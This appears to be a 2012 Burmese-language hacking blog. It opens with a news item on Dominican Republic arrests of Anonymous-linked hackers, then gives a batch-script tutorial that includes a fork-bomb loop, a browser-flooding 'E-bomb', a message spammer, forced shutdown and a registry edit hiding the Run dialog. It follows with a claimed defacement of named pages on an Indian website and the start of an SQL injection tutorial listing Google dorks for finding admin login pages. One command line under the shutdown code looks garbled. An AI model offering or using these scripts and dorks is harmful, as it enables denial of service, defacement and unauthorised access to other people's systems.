Wednesday, March 28, 2012

Dominican Republic Police arrested 6 Anonymous hackers



Dominican Republic Police has arrested six hackers , Milton Corniell David Jimenez (Zerohack), Juan Rafael Leonardo Acosta (Nmap), Cristian de la Rosa Jose de los Santos (Mot), Robert Reynoso Delgado (Frank-Ostia) linked to Anonymous and accused by the authorities of attacking websites of state and private companies. Public Prosecutor German Vasquez alleges the six hacked into government websites, including ones for the president and the education ministry. He says the suspects range in age between 17 and 23.

The members of combat cyber crime unit made the arrest in an joint operating in the country early Sunday in the capital Santiago. Defense lawyer Carlos Guerrero denies the accusations and says the government has no evidence.

The defendants are accused of cyber terrorism, which the prosecution defined as a new form of threats and vulnerabilities in the Internet. denunciations of the "hacks" to institutions DG Internal Revenue filed a complaint of "hacking" 30 August 2011.

Ref:PCP
Re shear from.........mmhackforums.noonhost.com
Read More ->>

.::How to Make Batch Yourself & Some Batch Code::.




Post by Nyi Panig Lay
source from mmhackforums.noonhost.com

အခ်ိဳ႕ဟာေတြက်ေတာ့ screen shot ရိုက္ဖို႔ခက္ခဲလို႔မထည့္လိုက္ပါဘူး..
ကုတ္ေတြကို အသံုးျပဳပံုကေတာ့ notepad ကိုဖြင့္ ျပီးရင္ ကုတ္ေတြကို ကူးထည့္၊ ျပီးေတာ့ ကိုယ္ၾကိဳက္တဲ့နာမည္ရဲ႕ေနာက္မွာ .bat ေလးထည့္ေပၚရံုပဲ.
ပထမဆံုး စမဲ့ကုတ္ကေတာ့ matrix ကုတ္ပဲျဖစ္ပါတယ္..@echo off ကစျပီး ကူးထည့္ရမွာျဖစ္ပါတယ္..


Code 1- The matrix look alike code


@echo off
color a
:top
echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
goto:top


Code 2- E-bomb







@echo off
:A
start iexplore nyipainglay.wall.fm
goto:A

အေပၚက ကုတ္ရဲ႕ nyipainglay.wall.fm ဆိုတဲ့ေနရာမွာ ၾကိဳက္တဲ့ url ထည့္ပါ..

Code #3- Manual message making SPAMMER!




@echo off
:A
msg * Hi Nyipainglay
goto:A

အေပၚက ကုတ္ရဲ႕ "Hi Nyipainglay"ဆိုတဲ့ေနရာမွာ ၾကိဳက္တဲ့ စာသားထည့္ႏုိင္ပါသည္..

Code #4- Current date and time code









@echo off
:A
echo Here is the current time %date% %time%
goto:A


Code #5- Black screen march (makes multiple command prompts and overloads computers memory)


@echo off
:A
Start
goto:A


Code #6- Simple text book diary log





notepad ကိုဖြင့္လိုက္ပါ..ျပီးရင္ .LOG လို႔ရိုက္ပါ..
ျပီးရင္ ၾကိဳက္တဲ့နာမည္တစ္ခုခုနဲ႔ save လိုက္ပါ.. .bat နဲ႔မဟုတ္ဘူးေနာ္..ရိုးရိုး.txt နဲ႔ပဲ
save လိုက္တဲ့ .txt ဖိုင္ကို ျပန္ဖြင့္ၾကည့္လိုက္ပါ.. အခ်ိန္နဲ႔ ရက္စြဲကို ျပေနပါလိမ့္မယ္..
ေနာက္တစ္ခုျပန္ဖြင့္ရင္လဲ ဒီအတိုင္းပဲျပေစဖို႔ ပိတ္ရင္ "Don't save" နဲ႔ ပဲပိတ္ပါ..

Code #7- Getting your self automated chat






dim fname
fname=inputbox(" Hi whats your name?")
fname=inputbox(" Whats up?")
fname=inputbox(" Thats kool.")

အေပၚက ကုတ္ေလးေတြကို notepad ထဲကူးျပီးရင္ ၾကိဳက္တဲ့နာမည္တစ္ခုခုရဲ႕ေနာက္မွာ .vbs ေလးထည့္ေပးပါ..

Code #8- code for opening and closing your CD drive

Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
if colCDROMs.Count = 1 then
for i = 0 to colCDROMS.Count - 1
colCDROMs.Item(i).Eject
colCDROMs.Item(i).Eject
Next ' cdrom
end
အေပၚကကုတ္ေလးေတြကို notepad ထဲကူးထည့္ပါ ျပီးရင္ ၾကိဳက္တဲ့နာမည္တစ္ခုခုရဲ႕ေနာက္မွာ .vbs ေလးထည့္ေပးပါ.

Code #9- shutdown computer
avidemux2_cli --run j-1.js --run j-2.js --end
shutdown.exe -s -t 00

အေပၚက ကုတ္ေလးကလည္း ကြန္ပ်ဴတာကို ပိတ္ေစမဲ့ကုတ္ေလးပါ.. ထံုးစံအတိုင္း notepad ထဲ ထည့္ျပီး save လိုက္ပါ..

Code #10-shut down computer
ဒါက ကုတ္ေတာ့မဟုတ္ဘူးဗ်..ကြန္ပ်ဴတာကို run ကေန shutdown ခ်မယ့္ command ပါ..
shutdown -s -t -00
အေပၚက command ထဲက 00 ရဲ႕ေနရာမွာ ၾကိဳက္တဲ့အခ်ိန္(second) ထားႏိုင္ပါတယ္..
ကၽြန္ေတာ္ဆို အိပ္ခါနည္းသီခ်င္းေလးေတြဖြင့္ထားျပီး ဒီကြန္မန္းေလးနဲ႔ အိပ္တယ္ဗ်..shtudown -s -t -1800
နာရီ၀က္ေနရင္ သူ႔ဘာသာသူ ပိတ္သြားမွာေပါ့ေနာ္..

ဒါေလးေတြ သိရံုနဲ႔ ေတာ္ေတာ္တတ္သြားျပီလို႔ ကၽြန္ေတာ့္လိုထင္မိသူမ်ားအတြက္ လွ်ာရွည္လိုက္ပါဦးမယ္..(ကိုယ့္ဘာသာကို ေျပာတာပါ:P)
အမွန္ဆို ကၽြန္ေတာ္တို႔ ကိုယ္တိုင္ေရးႏိုင္ရမွာ..သူမ်ားေရးထားတဲ့ ကုတ္ေတြကူးျပီး ဟိုဆိုက္ပိုစ့္တင္လုပ္ေနလို႔ ဘယ္သူမွ အထင္ၾကီးမွာ မဟုတ္ပါဘူ..
(အထင္ၾကီးေစခ်င္လို႔တင္တာလဲမဟုတ္ပါဘူး)ေျပာခ်င္တာက ကုတ္ေတြကို ကိုယ္တိုင္နားလည္ေအာင္လုပ္သင့္တယ္..ျပီးေတာ့ ကိုယ့္ဘာသာကို ေရးႏိုင္ရပါမယ္..


ကိုယ့္ဘာသာကိုေရးတတ္ခ်င္သူမ်ားအတြက္ parameter 15 ခုရဲ႕ အသံုး၀င္ပံု/ခ်ပံု မ်ားကို ေလ့လာႏိုင္ေအာင္ ကူးယူတင္ျပေပးလိုက္ပါတယ္...
1. @echo off
ဒါကေတာ႔ Script ရဲ႕ အစပိုင္းမွာေရးသားရတဲ႕ စကားလံုးပါ။ ကၽြန္ေတာ္တို႔ Win+R ကိုႏွိပ္လိုက္ရင္ Run Dialogbox က်လာပါမယ္။ အဲ႕ဒီအထဲမွာ cmd လို႔ရိုက္ထည့္လိုက္ၿပီး Enter ေခါက္လိုက္ရင္ Windows Command Prompt ေပၚလာပါတယ္။ အဲ႕ဒီ Cmd ရဲ႕ Dos Mode မွာဆိုရင္ C:\Documents and Settings\Admin စတဲ႕စာတန္းႀကီးေပၚေနပါလိမ္႔မယ္။ ကၽြန္ေတာ္တို႔ Script ေတြနဲ႕ အလုပ္လုပ္တဲ႕ အခ်ိန္မွာ အျမင္ရွင္းရွင္းေလးနဲ႕ အလုပ္လုပ္လို႔ရေအာင္ @echo off ဆိုတာကိုရိုက္ထည့္လိုက္ျခင္းျဖင္႔ အထက္က C:\Documents and Settings\Admin စာတန္းကို ေပ်ာက္ေနေစပါတယ္။

2. echo
ဒါကေတာ႔ မိမိ ေဖာ္ျပလိုတာ စာသားကို Dos Mode မွာ Output(ျမင္ရေအာင္) ျပမယ္႔ စာတန္းရဲ႕ ေရွ႕မွာသံုးပါတယ္။ ျပသလိုတဲ႕ စာတန္းကို echo ရဲ႕ ေနာက္မွာ ဘားတစ္ခ်က္ပုတ္ၿပီး ေရးပါတယ္။
ဥပမာ။ nyipainglay is regestered member of MHF. ကိုေရးခ်င္တယ္ဆိုပါစို႔…
echo nyipainglay is regestered member of MHF
ေပါ႔………..

3. echo.
echo ေနာက္မွာ ဖူးစေတာ႔(.) ပါလာရင္ေတာ႔ တစ္ေၾကာင္းျခားလိုက္တာပါ။ စာတန္းေတြ ၾကည့္လို႔ ေကာင္းေအာင္ ခ်ဲလိုက္တဲ႕ သေဘာပါပဲ။

4. :_
Full Column & Under Score သေကၤတႏွစ္ခုပါတဲ႕ Keyword ကေတာ႔ Script တစ္ခုရဲ႕ အစိတ္အပိုင္းတစ္ခုဆိုတာကို သတ္မွတ္ေပးတာပါ။ ေခါင္းစဥ္ငယ္ေပါ႔ဗ်ာ။

5. color
color ဆိုမွေတာ႔ အေရာင္ေပါ႔ဗ်ာ……. Background Color နဲ႕ စာလံုး Color ကိုေရြးေပးတာပါ။ ဥပမာ အေနနဲ႕ 0A ဆိုရင္ ေရွ႕က 0 က ေနာက္ခံ Background, ေနာက္က A က စာလံုးအေရာင္ ကိုေျပာတာပါ။
အကယ္လို႔မ်ား 0 မပါပဲ A တစ္လံုးထဲေရးထားမယ္ဆိုရင္ေတာ႔ Background အေရာင္ဟာ Default အေရာင္ ျဖစ္တဲ႕ အနက္ေရာင္ပဲ ျဖစ္ေနပါလိမ္႔မယ္။ အေရာင္ေတြနဲ႕ ပါတ္သက္လို႔ keyword ေတြကို သိခ်င္တယ္ဆိုရင္ cmd ထဲမွာ color/? ဆိုၿပီးရိုက္ထည့္ၿပီး ရွာၾကည့္လို႔ရႏိုင္ပါတယ္။

6. set val=
ဒါကေတာ႔ ရွင္းျပရင္နည္းနည္းပိုရႈပ္မယ္။ လုပ္ရင္းနဲ႕ေတာ႔ နားလည္သြားမွာပါ။ အၾကမး္ေျပာျပရမယ္ဆိုရင္ user က Input တစ္ခုသြင္းလိုက္တဲ႕ အခါ အဲ႕ဒီ Input ကို Val ဆိုတဲ႕ ကိန္းရွင္တစ္ခုအေနနဲ႕ သတ္မွတ္မယ္လို႔ေျပာတာပါ။ Variable အမ်ိဳးမ်ိဳးရွိတဲ႕ အနက္ String အမ်ိဳးအစားပဲျဖစ္ရမယ္လို႔ေျပာတာပါ။ ဒီေနရာမွာ set ဆိုတဲ႕ keyword က အေသျဖစ္ေပမယ္႔ val ကေတာ႔ ႀကိဳက္ရာေပးလို႔ရပါတယ္။

7. set /p val=
အထက္က နည္းတူပါပဲ။ ဒါကေတာ႔ User ကို Input တစ္ခု ရိုက္ထည့္ေပးဖို႔ ေတာင္းတာပါ။ /p ပါတဲ႕ အတြက္ သတ္မွတ္ထားတဲ႕ input မဟုတ္ရင္ program က အလုပ္မလုပ္ပါဘူး။ val ကေတာ႔ အရွင္ပါ။

8. if
ဒါကေတာ႔ ကိန္းရွင္တစ္ခုကို သတ္မွတ္ၿပီးလို႔ user က input သြင္းလိုက္တဲ႕အခါမွာ သတ္မွတ္ထားတာမွန္ရင္ ဘာလုပ္ပါ၊ သတ္မွတ္ထားတာမဟုတ္ရင္ ဘာလုပ္ပါ ဆိုတာကို if နဲ႕ေရးပါတယ္။ သိပ္မရွင္းေတာ႔ဘူးဗ်ာ…. ရွင္းေလရႈပ္ေလျဖစ္သြားလိမ္႔မယ္။ နားမလည္ေသးတဲ႕လူေတြအဖို႔ေပါ႔။ နားလည္တဲ႕သူေတြအဖို႔ေတာ႔ ေအးေဆးေပါ႔ေနာ္…….. (သူ႔ရဲ႕ေနာက္မွာ /I ပါလာရင္( if /I ) ဆိုရင္ Input က A = a , ႀကီးႀကီး၊ ေသးေသး အလုပ္လုပ္ပါတယ္၊ သေဘာက္ေတာ႔ အရြယ္မေရြးဘူးေပါ႔ဗ်ာ၊ MZ က ဇာနည္ေအာင္(ဇူဇူး) လိုေပါ႔)

9. cls
ဒါကေတာ႔ သန္႔ရွင္းေရးပါ။ Screen မွာ ရႈပ္ေနရင္ cls ကိုသံုးလိုက္၊ အကုန္ရွင္းၿပီးသားပဲ။

10. pause
ဒါကေတာ႔ တစ္ခုခုလုပ္ၿပီးလို႔ နားတဲ႕အခ်ိန္မွာ ျပသဖို႔ ေရးတဲ႕စကားလံုးပါပဲ။ ဒီစာလံုးေလးထည့္လိုက္ရင္ “Press any key to continue” ဆိုတာ ေပၚလာပါလိမ္႔မယ္။

11. goto
ဒါကေတာ႔ ဘယ္သြားမလဲ ေမာင္ေရခဲ ေပါ႔။ သြားခ်င္တဲ႕ ေခါင္းစဥ္ခြဲကို ျပေပးရပါတယ္။ ခဏက အထက္မွာေရးထားတဲ႕ “ :_ ” ေခါင္းစဥ္ခြဲကိုသြားတဲ႕လမ္းေၾကာင္းပါ။

12. call
ေကာ ဆိုမွေတာ႔ ေခၚတာေပါ႔ေနာ္။ လက္ရွိ program ကေန ခ်ိတ္ဆက္ထားတဲ႕ ေနာက္ Program တစ္ခုကို လွမ္းေခၚတာပါ။ call Hide 1.cmd ဆိုရင္ Hide 1.cmd ဆိုတဲ႕ ဖိုင္ကို run ေပးပါလိမ္႔မယ္။
( တျခား ေကာ(call) တဲ႕ကိစၥေတြကိုေတာ႔ ကိုရသာ၊ ကိုပရင္႔ တို႔နဲ႕ ဆက္သြယ္ႏိုင္ပါတယ္။ )

13. exit
လက္ရွိ program ကေနထြက္မယ္လို႔ေျပာတာပါ။
(MZ က exiter နဲ႕လံုး၀(လံုး၀) မသက္ဆိုင္ပါ။ အျမဲတမ္း ထြက္ေနတဲ႕ ကိုထြက္ေပါက္ဟာ Mafia နဲ႕မွ ထြက္ေပါက္ရွာမရျဖစ္ေနပါတယ္။
14. reg add
ဒါေလးကေတာ႔ အေရးႀကီးပါတယ္။ အဓိက အစိတ္အပိုင္းလည္းဟုတ္ပါတယ္။ add ဆိုေတာ႔ ေပါင္းတာ၊ ထည့္တာေပါ႔ေနာ္။ reg ေတြကို ေပါင္းထည့္္ၾကတဲ႕ အခါ သံုးပါတယ္။ သူ႔မွာလည္း ဆင္႔ကဲ( လက္ခြဲ ) Parameter ေလးေတြ၊ သတ္မွတ္ခ်က္ ေလးေတြရွိပါတယ္။ အသံုးမ်ားတာက /v, /ve, /t, /d, /f တို႔ျဖစ္ပါတယ္။
/v - ကေတာ႔ Value တစ္ခုကိုနာမည္ေပးခ်င္တဲ႕အခါ သံုးပါတယ္။ reg add ရဲ႕ ေနာက္မွာ ဘားတစ္ခ်က္ပုတ္ၿပီး ေရးပါတယ္။ ေနာက္ၿပီး သူ႔ေနာက္မွာပဲ ဘားတစ္ခ်က္ပုတ္ၿပီး ထည့္ခ်င္တဲ႕ reg ရဲ႕ Value ကိုရိုက္ထည့္ပါတယ္။
/ve - ကေတာ႔ Value Name ကို User က မေပးပါ။ စက္ကေပးတဲ႕ Default ကိုပဲ သံုးပါမယ္ ဆိုတဲ႕ အခါ သံုးပါတယ္။
/t - ကေတာ႔ Value ရဲ႕ Data Type ကို ေၾကာ္ျငာတာပါ။ Data Type (၅) မ်ိဳးထဲက ဘယ္ Data type ကို သံုးမယ္ဆိုတာကို /t ခံၿပီးေၾကာ္ျငာပါတယ္။ ဥပမာ - REG_DWORD ကို ေၾကာ္ျငာမယ္ဆိုရင္ /t reg-dword ဆိုၿပီး /t ေနာက္မွာ ဘားတစ္ခ်က္ပုတ္ၿပီး ေၾကာ္ျငာပါတယ္။ /t ဆိုတဲ႕ စာသားမပါလာဘူးဆိုရင္ေတာ႔ စက္က သူ႔ရဲ႕ Default Data Type ျဖစ္တဲ႕ REG_SZ လို႔ပဲ သတ္မွတ္သြားမွာျဖစ္ပါတယ္။
/d - ကေတာ႔ DATA ေၾကာ္ျငာတာပါ။ ထံုးစံအတိုင္း သူ႔ေနာက္မွာ ဘားတစ္ခ်က္ပုတ္ၿပီး ေရးပါတယ္။
/f - ကေတာ႔ data တစ္ခုကိုထည့္တာပဲျဖစ္ျဖစ္၊ ဖ်က္တာပဲျဖစ္ျဖစ္ ျပဳလုပ္တဲ႕အခါ ယခင္က သတ္မွတ္ထားတဲ႕ တန္ဖိုး တစ္ခုခုရွိေနပါလိမ္႔မယ္။ အဲ႕ဒီ တန္ဖိုးကို ဖ်က္မလားလို႔ program က user ကို ျပန္ေမးတတ္ပါတယ္။ /f ထည့္ထားရင္ေတာ႔ မေမးနဲ႕ တန္းဖ်က္လိုက္ပါလို႔ ေျပာတာပါပဲ။

15. reg delete
ရွင္းပါတယ္။ ဖ်က္တာေပါ႔ reg ကိုဖ်က္တာပါ။ reg add မွာ တစ္ခုခု ထည့္မယ္ဆိုရင္ Value name /v, Data type /t, /d တို႔ကို မျဖစ္မေနထည့္ေပးမွ reg တန္ဖိုးထည့္လို႔ရမွာပါ။ reg delete မွာေတာ႔ /v တစ္ခု ဖ်က္တာနဲ႕ တင္ လံုေလာက္ပါတယ္။ တန္ဖိုးကို ဖ်က္မလားလို႔ မေမးေစခ်င္ရင္ေတာ႔ တစ္လက္စတည္း /f ပါ ထည့္လိုက္။ ဒါဆိုအရွင္းပဲ………………….

ကၽြန္ေတာ္တို႔ Script (Program) တစ္ခု မစ ခင္မွာ Program တစ္ခုနဲဲ႕ ပါတ္သတ္လို႔ အနည္းငယ္ေျပာျပခ်င္ပါတယ္။ Program တစ္ခုမွာ Input , Process , Output ဆိုၿပီးသံုးမ်ိဳးရွိပါတယ္။
Input = User က ထည့္ေပးရတာ
Process = ကြန္ပ်ဴတာက လုပ္ေဆာင္ေပးတာ
Output = လုပ္ေဆာင္ခ်က္ေတြကို ျပသေပးတာ
ဒီသံုးမ်ိဳးကို အလ်ဥ္းသင္႔ေအာင္ စဥ္းစားေပးရပါတယ္။ စၿပီးမေရးခင္ကတည္းကေပါ႔။
အလုပ္လုပ္သြားတဲ႕ နည္းလမ္းေတြကေတာ႔ ဒီသံုးမ်ိဳးကို ပတ္လည္ရိုက္တာပါပဲ။ R တာေပါ႔ဗ်ာ…..
Input ------------à Process -------------à Output
ဒီသေဘာကေတာ႔ ရွင္းပါတယ္။ ေရးတယ္- လုပ္တယ္ - ျဖစ္သြားတယ္။
Output-----------à Input----------à Process------------à Output
ဒါကေတာ႔ ျဖစ္ႏိုင္တာေတြ ခ်ျပမယ္။ User ကို ေရြးခ်ယ္ခြင္႔ေပးမယ္။ User ကေရြးခ်ယ္လိုက္တဲ႕ (Input) ကို ကြန္ပ်ဴတာက အလုပ္လုပ္တယ္။ ျပင္ဆင္တဲ႕ အတိုင္းျဖစ္သြားတယ္။
ဒီေတာ႔ ကိုယ္ေရးမယ္႔ Script က ဘယ္လိုလမ္းေၾကာင္းက သြားမလဲ၊ မေမးမျမန္းေတာ႔ပဲ ထည့္စရာရွိတာေတြထည့္၊ ဖ်က္စရာရွိတာေတြ ဖ်က္မွာလား။ စသည္ျဖင္႔ကို Script မေရးခင္ အႀကမ္းေရးဆြဲထားသင္႔ပါတယ္။ Psuedo Code & Flow Chart ေတြေတာ႔ မဆြဲပါနဲ႕။ ဒါေတြပါဆြဲခ်င္တယ္ဆိုရင္ေတာ႔ ဒီမွာ ၀င္ဖတ္လိုက္ပါ။ (အဟိ ေၾကာ္ျငာ ၀င္လိုက္တာ )။

ကဲ စၿပီး လက္တည့္စမ္းလိုက္ရေအာင္ဗ်ာ………….

ပထမဦးဆံုးအေနနဲ႕ Run Command ကိုေဖ်ာက္ၾကည့္မယ္။ တစ္ခါတည္းမေျပာမဆို မေဖ်ာက္ဘူးဗ်ာ။ အရင္ေမးၾကည့္ၿပီးမွ ေဖ်ာက္တာေပါ႔။ ေအာက္က စာသားေတြကို Note Pad ထဲကို ကူးထည့္လိုက္ပါ။

@echo off
color 0a
:-main
echo.
echo.
set /p val= Do you want to hide Run Dialogbox(y/n)?
if /I "%val%"=="y" goto -Hide
if /I "%val%"=="n" goto -Quit
goto:-main


:-Hide
echo.
echo.
reg add hkcu\software\microsoft\windows\currentversion\pol icies\explorer /v NoRun /t reg_dword /d 1
echo.
echo.
pause
exit


:-Quit
exit

ဒါေလးကိုကူးၿပီး notepad ထဲထည့္၊ ေနာက္ၿပီး ႀကိဳက္တဲ႕နာမည္ေပးၿပီး .cmd နဲ႕သိမ္းလိုက္။ ဥပမာ norun.cmd ေပါ႔။ သိမ္းလိုက္တဲ႕ ဖိုင္ေလးကို ၾကည့္လိုက္ရင္ စက္သြားပံုေလးနဲ႕ ေပၚေနလိမ္႔မယ္။ ဒါေလးကိုႏွစ္ခ်က္ ႏွိပ္လိုက္ရင္

Do you want to hide Run Dialogbox(y/n)?
ဆိုတာေလးေပၚလာလိမ္႔မယ္။ အနက္ေရာင္ေနာက္ခံေပၚမွာ အစိမ္းေရာင္ စာတန္းနဲ႕။ Run ကို ပိတ္ခ်င္တယ္ ဆိုရင္ y လို႔ရိုက္လုိက္ၿပီး Enter ေခါက္လုိ္က္ပါ။ ဒါဆိုရင္ေတာ႔

The operation completed successfully

Press any key to continue…


ဆိုတာေပၚလာၿပီး ကီး တစ္ခုခုကို ႏွိပ္လုိက္တာနဲ႕ cmd လဲ အလို အေလွ်ာက္ပိတ္သြားပါလိမ္႔မယ္။

n ႏွိပ္ၿပီး Enter ေခါက္လိုက္မယ္ဆိုရင္ေတာ႔ တစ္ခါတည္း cmd ပိတ္သြားမွာျဖစ္ပါတယ္။

y , n မဟုတ္တဲ႕ တျခားစာလံုး တစ္ခုခုကိုရိုက္ထည့္မယ္ဆိုရင္ေတာ႔ အဲ႕ဒီ စာသားသာ ထပ္ တလဲလဲ ေပၚေနမွာျဖစ္ပါတယ္။
__________________


Script အေၾကာင္းကုိ သိခ်င္တဲ့လူေတြ အတြက္
ဲ့ Script ေတြအျပင္ တစ္ေယာက္ က Script ေရး ဒါမွမွဟုတ္ ကုိယ္မသိ ေသးတဲ့ Script ကုိယူ ၿပီးရင္ အဲဒီ Script ထဲက Command or Code အေၾကာင္းေတြကုိ ဒါက ဘာ ဒါက ဘာလုပ္တာဆုိၿပီး သိတဲ့ သူ တစ္ေယာက္ေယာက္ ဒါမွမဟုတ္ ၀ုိင္းၿပီး တစ္ေၾကာင္းခ်င္းကုိ ရွင္းေစခ်င္တယ္ဗ်ာ။

ဥပမာ

1/ @echo off
2/ color 0a
3/ :-main
4/ echo.
5/ echo.
6/ set/p val = Do you want to hide Run Dialogbox (y/n)?
7/ if/I"%val%"=="y" goto -Hide
8/ if/I"%val%"=="y" goto -Quit
9/ goto :-main

10/ :-Hide
11/ echo.
12/ echo.
13/ reg add hkcu\software\microsoft\windows\currentversion\pol icies\
explorer /v Norun /t reg_dword /d 1
14/ echo.
15/ echo.
16/ pause
17/ exit

18/ :-Quit
19/ exit

----
End
----


လုိ္င္းအမွတ္(၁) - "@echo off" Program အစမွာ မပါမျဖစ္ ပါရမယ့္စကားပါ။ဒီစကားလုံးမပါရင္ Display Window မွာ ရႈပ္ေထြးမႈ ေတြျဖစ္ေနပါမယ္။ဒီစကားလံုးပါတဲ့ အတြက္ ကုိယ္ေျပာခ်င္တာကုိ ရွင္းရွင္းလင္းလင္း ျမင္ရတာပါ။

လုိင္းအမွတ္(၂) - "color 0A" လုိ႕႕ေရးထားတာက Program မွာ ေအာက္ခံအေရာင္က အနက္၊ စာလုံးက အစိမ္းေရာင္သံုးမယ္လုိ႕ ေျပာတာပါ။

လုိင္းအမွန္(၃) - ":-main" လုိ႕ေရးထားပါတယ္။ Program ေရးရာမွာ လြယ္ကူေစရန္ Subprogram ေတြခြဲၿပီး ေရးေလ့ရွိပါတယ္။ ဒီProgram မွာ Input ကုိ အပုိင္းတစ္ပုိင္း| Process နဲ႕ Output ကုိ အပုိင္းတစ္ပုိင္း | Program ပိတ္ဖုိ႕ုကုိ အပုိင္းတစ္ပုိင္း | စုစုေပါင္း အပုိင္း (၃) ပုိင္းခြဲၿပီးေရးမယ္လုိ႕ စဥ္းစားထားပါတယ္။ဒါေၾကာင့္ လုိင္းအမွတ္ (၃) မွာ ဒါဟာ Program အစိတ္အပုိင္း တစ္ခုျဖစ္ပါတယ္။ သူ႕ကုိ main လုိ႕ အမည္ေပးထားတယ္လုိ႕ ေျပာတာပါ။
ႀကိဳက္ရာနာမည္ ေပးလုိ႕ရပါတယ္။

လုိင္းအမွတ္(၄)(၅) - "echo." ဆုိတာကေတာ့ မ်ဥ္းအလြတ္ (၂) ေၾကာင္းျခားၿပီးမွ ေပၚေစခ်င္လုိ႕ သံုးထားတာပါ။

လုိင္းအမွတ္(၆)(၇)(၈) - Input အပုိင္းပါ။ User ဆီက Input ေတာင္းမယ္၊ အဲဒီ Input ကုိ val ဆုိတဲ့ ကိန္းရွင္နဲ႕ ဖမ္းယူမယ္။ User ထည့္မယ့္ Input ဟာ "y" or "n" ပဲျဖစ္ရမယ္လို႕ ေျပာတာပါ။ Input ဟာ "y" (ေသးေသးႀကီးႀကီး) Hide ဆုိတဲ့ subprogram ကုိသြားမယ္လို႕ လုိင္းအမွတ္(၇) က ေျပာတာပါ။Input ဟာ "n" (ေသးေသးႀကီးႀကီး) Quit ဆုိတဲ့ subprogram ကုိသြားမယ္လို႕ လုိင္းအမွတ္(၈) က ေျပာတာပါ။

လုိင္းအမွတ္(၉) - User သြင္းလုိက္တဲ့ Input ဟာ "y" လည္းမဟုတ္၊ "n" လည္းမဟုတ္ ရင္ မူလေမးခြန္းကုိပဲ ျပန္ေပၚေအာင္ subprogram main ကုိျပန္သြားဖုိ႕ ေျပာတာပါ။

လုိင္းအမွတ္(၁၀) - Subprogram Hide ျဖစ္တယ္လုိ႔ ေျပာတာပါ။
လုိင္းအမွတ္(၁၁)(၁၂) - မ်ဥ္းအလြတ္ ၂ ေၾကာင္း

လုိင္းအမွတ္(၁၃) - Process အပုိင္းပါ။ User က Hide လုပ္ခ်င္တယ္လုိ႕ ေျပာတဲ့ အတြက္ Run Box ကုိ လက္ရွိ User မွ ေျပာက္ေအာင္လုပ္တဲ့ Registry Setting ေတြကုိ Registry မွာထပ္ထည့္တာပါ။

လုိင္းအမွတ္(၁၄)(၁၅) - မ်ဥ္းအလြတ္ ၂ ေၾကာင္း

လုိင္းအမွတ္(၁၆) - Program ကေနထြက္ဖုိ႕ ႀကိဳက္ရာ ခလုတ္တစ္ခုခုကုိ ႏွိပ္ပါလို႕ စက္က Output ထုတ္ေပးေအာင္ ထည့္ထားတာပါ။ဒီလုိင္း ကို မထည့္ လည္းရပါတယ္။ မထည့္ရင္ Program က ခ်က္ခ်င္းပိတ္သြားမွာ ျဖစ္ပါတယ္။

လုိင္းအမွတ္(၁၇) - Program ကုိ ပိတ္ဖုိ႕ ေရးထားတာပါ။

လုိင္းအမွတ္(၁၈) - Subprogram Quit ျဖစ္တယ္လုိ႕ ေျပာတာပါ။
လုိ္င္းအမွတ္(၁၉) - User က "n" ကုိေရြးလုိက္လုိ႕ လာမွမလုိပ္ဘဲ Program တန္းပိတ္ဖုိ႕ ထည့္ထားတာပါ။

ဒီ Script Program ကုိ ဘယ္လုိေရးသလဲဆုိတာ ရွင္းၿပီထင္ပါတယ္။

ဒီblog ေလးက ေတာ့ ကိုထူးခၽြန္ရဲ႔ Introduction to WINDOWS REGISTRY ဆုိတဲ့ စာအုပ္ထဲကပါ။

ကၽြန္ေတာ္ ႏွစ္သက္လို႔တင္ေပးလိုက္ပါတယ္ ။
Read More ->>

Tuesday, March 27, 2012

www.nanuindia.com H@cK By ME



Date 28.3.2012
Time 10:45 AM

Link: http://www.nanuindia.com/contactus.php


 second Link: http://www.nanuindia.com/details.php?cat_id=1


I will go forward....../
shwekoyantaw.blogspot.com

You don't see image well....click upon It.......
Read More ->>

Sql injection Tutorials::..



Sql injections နဲ႕ ပတ္သက္ျပီး tutorials ေတြအမ်ားၾကီးဖတ္ဖူးပါတယ္။ဒါေပမယ့္ ဘီဂင္းနားေတြအတြက္ အခက္
အခဲရိွတာၾကီးပါပဲ.......သူတို႕ကေရးထားတာ ပညာရွင္ အဆင့္ကိုဗ်.......။ကၽြန္ေတာ္ကေတာ့ ဘီဂန္းနားအဆင့္ေတြ
(ကၽြန္ေတာ့္လိုေပါ့) နားလည္ေအာင္ေရးသြားမွာပါ။

ပထမဆံုး Database အေၾကာင္းကိုအရင္ဆံုးသိထားရမယ္



Database ဆိုတာဘာလဲ ဆိုေတာ့ Data အစုအေ၀းၾကိးျဖစ္ပါတယ္။ကဲေအးေရာ........။ဟုတ္ပါတယ္ website
တစ္ခုရဲ႕ အခ်က္အလက္ေတြ ကို အဲဒိထဲမွာသိမ္းထားပါတယ္......။User name ေတြ password ေတြေကာေပါ့
အဲဒီထဲမွာ Admin password ေတြပါ ပါ၀င္ပါတယ္....။(ဟုတ္မဟုတ္ေတာ့မသိဘူး) .ဟဲဟဲ။

ေရွာင္ကြင္း၀င္ေရာက္ျခင္း


ဆိုက္တစ္ခုမွာ username, password ေတြစစ္တယ္ဆိုတာတစ္ကယ္ေတာ့ တျခားႏိုင္ငံ အလည္သြား ရင္ ပတ္စ္ပို႕ စစ္သလိုပါပဲ။မွတ္ပံုတင္ထားတဲ့သူကိုသာ၀င္ေရာက္ခြင့္ျပဳမွာပါ....ဒါေပမယ့္ ေတာ္ေတာ္ညံ့တဲ့
web developer ေတြေရးထားတဲ့ဆိုက္ေတြဆိုရင္ user registration လုပ္ထားျခင္းမရိွပဲ ေက်ာ္လႊား၀င္ေရာက္ ႏိုင္ပါတယ္..။
စမ္းသပ္ၾကည့္ႏိုင္ပါတယ္.......။ေအာက္ပါကုတ္ေတြကို google search မွာရွာပါ။

Code:
"inurl:admin.asp"
"inurl:login/admin.asp"
"inurl:admin/login.asp"
"inurl:adminlogin.asp"
"inurl:adminhome.asp"
"inurl:admin_login.asp"
"inurl:administratorlogin.asp"
"inurl:login/administrator.asp"
"inurl:administrator_login.asp"
ထြက္လာတဲ႔ result ေတြထဲက ၾကိဳက္တာ click ေထာက္ပါ...
ADMIN USERNAME :
PASSWORD :
ဆိုျပီး ဒီလိုမ်ိဳးေတာင္းတာေလးေတြ ေတြ႔ရပါလိမ္႔မယ္...။

